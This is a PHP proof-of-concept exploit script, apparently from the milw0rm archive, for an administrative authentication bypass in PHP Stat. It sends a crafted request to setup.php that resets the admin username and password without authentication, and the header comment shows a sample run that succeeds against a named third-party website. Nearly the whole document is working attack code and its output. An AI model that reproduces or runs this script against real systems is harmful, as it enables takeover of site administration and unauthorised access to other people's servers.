112 lines
No EOL
2.7 KiB
PHP
112 lines
No EOL
2.7 KiB
PHP
<?
|
|
|
|
/*
|
|
|
|
**************************************************************
|
|
PHP Stat Administrative User Authentication Bypass POC Exploit
|
|
Code by Nikyt0x - Soulblack Security Research
|
|
**************************************************************
|
|
|
|
Advisory:
|
|
http://www.soulblack.com.ar/repo/papers/phpstat_advisory.txt
|
|
|
|
Saludos:
|
|
Soulblack Staff, Status-x, NeosecurityTeam,
|
|
KingMetal, SWP, Trespasser...
|
|
|
|
nikyt0x@gmail.com
|
|
http://www.nikyt0x.tk
|
|
|
|
**************************************************************
|
|
**This Exploit Change Admin Username and Password
|
|
**Username: admin
|
|
**Password: admin
|
|
**************************************************************
|
|
|
|
|
|
php sbphpstatpoc.php www.spazfarm.com /spazstats/setup.php
|
|
|
|
==============================================================
|
|
PHP Stat Administrative User Authentication Bypass POC Exploit
|
|
==============================================================
|
|
by Nikyt0x - Soulblack Security Research
|
|
|
|
[+] Testing: www.spazfarm.com
|
|
[+] Socket
|
|
[+] Sending Exploit
|
|
[+] OK
|
|
|
|
Open www.spazfarm.com/spazstats/setup.php
|
|
|
|
Username: admin
|
|
Password: 123456
|
|
|
|
**************************************************************
|
|
*/
|
|
|
|
// username and password
|
|
|
|
$username = "admin";
|
|
$password = "123456";
|
|
|
|
function sh0w()
|
|
{
|
|
echo "\n ==============================================================\n";
|
|
echo " PHP Stat Administrative User Authentication Bypass POC Exploit\n";
|
|
echo " ==============================================================\n";
|
|
echo " by Nikyt0x - Soulblack Security Research\n\n";
|
|
}
|
|
|
|
if ($argc != 3)
|
|
{
|
|
sh0w();
|
|
echo "\n\n Usage:\n sbphpstatpoc.php www.site.com /dir/to/setup.php\n";
|
|
exit();
|
|
}
|
|
|
|
|
|
if(!ereg('setup.php',$argv[2])) {
|
|
echo "URL to setup.php Incorrect.\n";
|
|
exit(0);
|
|
}
|
|
|
|
sh0w();
|
|
|
|
echo " [+] Testing: $argv[1]\n";
|
|
|
|
$s0ck3t = fsockopen($argv[1], 80);
|
|
|
|
if (!$s0ck3t) {
|
|
echo " [-] Socket\n";
|
|
exit(0);
|
|
} else {
|
|
|
|
$petici0n = "GET $argv[2]?check=yes&username=$username&password=$password HTTP/1.1\r\n";
|
|
$petici0n .= "Host: $argv[1]\r\n";
|
|
$petici0n .= "Connection: Close\r\n\r\n";
|
|
|
|
echo " [+] Socket\n";
|
|
|
|
if(!fwrite($s0ck3t, $petici0n))
|
|
{
|
|
echo " [-] Sending Exploit\n";
|
|
exit(0);
|
|
}
|
|
echo " [+] Sending Exploit\n";
|
|
|
|
while (!feof($s0ck3t)) {
|
|
$g3tdata = fgets($s0ck3t, 1024);
|
|
if (eregi('Setup has been updated',$g3tdata))
|
|
{
|
|
echo " [+] OK\n\n";
|
|
echo " Open $argv[1]$argv[2]\n\n Username: $username\n Password: $password\n";
|
|
exit();
|
|
}
|
|
|
|
}
|
|
fclose($s0ck3t);
|
|
}
|
|
|
|
?>
|
|
|
|
# milw0rm.com [2005-05-30]
|